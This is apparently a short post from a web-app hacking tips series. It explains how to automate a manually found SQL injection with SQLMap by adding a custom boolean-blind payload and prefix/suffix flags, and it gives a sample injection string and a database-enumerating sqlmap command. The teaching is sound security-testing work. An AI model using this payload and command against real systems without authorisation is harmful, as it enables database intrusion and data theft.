Week 7 - Advanced SQLMap
Last updated
Last updated
It’s Week 7 of our Web App Hacking Tips & Tricks Series! Today we’ll be covering one of my favorite topics, Advanced SQL Injection.
Have you ever been testing an application that appears vulnerable to SQL Injection, but you were unable to automate using SQLMap? This has happened to me in the past and is a major pain-in-the-butt. I used to add a “tamper=space2comment” and hope for the best! Nowadays I have a much better approach.
To start off, I always recommend manually finding a working Proof-of-Concept (POC) with Burp Suite (if you want a future post on manual SQL Injection tips, let me know in the comments). From here, you can add your own custom payload into SQLMap. The folder containing all the payload files can be found here:
/usr/share/sqlmap/data/xml/payloads/
First, add the payload in the attached photo below to your ‘boolean_blind.xml’ payload file. Since SQLMap can be finnicky, I’ve found that simplifying the custom payload to only its inference is the most reliable method. Then, use the flags ‘prefix’ and ‘suffix’ to construct the rest of the Proof-of-Concept query you’ve found earlier. For example, if your working POC looks like:
test.php?id=1']+OR+[1=1]);/*
Then to exploit with your custom payload, your SQLMap command would be:
sqlmap -u "<target-url>" --dbs --prefix="']+OR+[" --suffix="]);/*"
If all goes well, you should have successfully automated SQL Injection using your custom payload!
If you find you’re still having trouble or are dealing with connection errors, just proxy through Burp Suite using the ‘proxy’ flag. I’ve found this alone solves a good deal of connection errors. Try the ‘force-ssl’ flag too.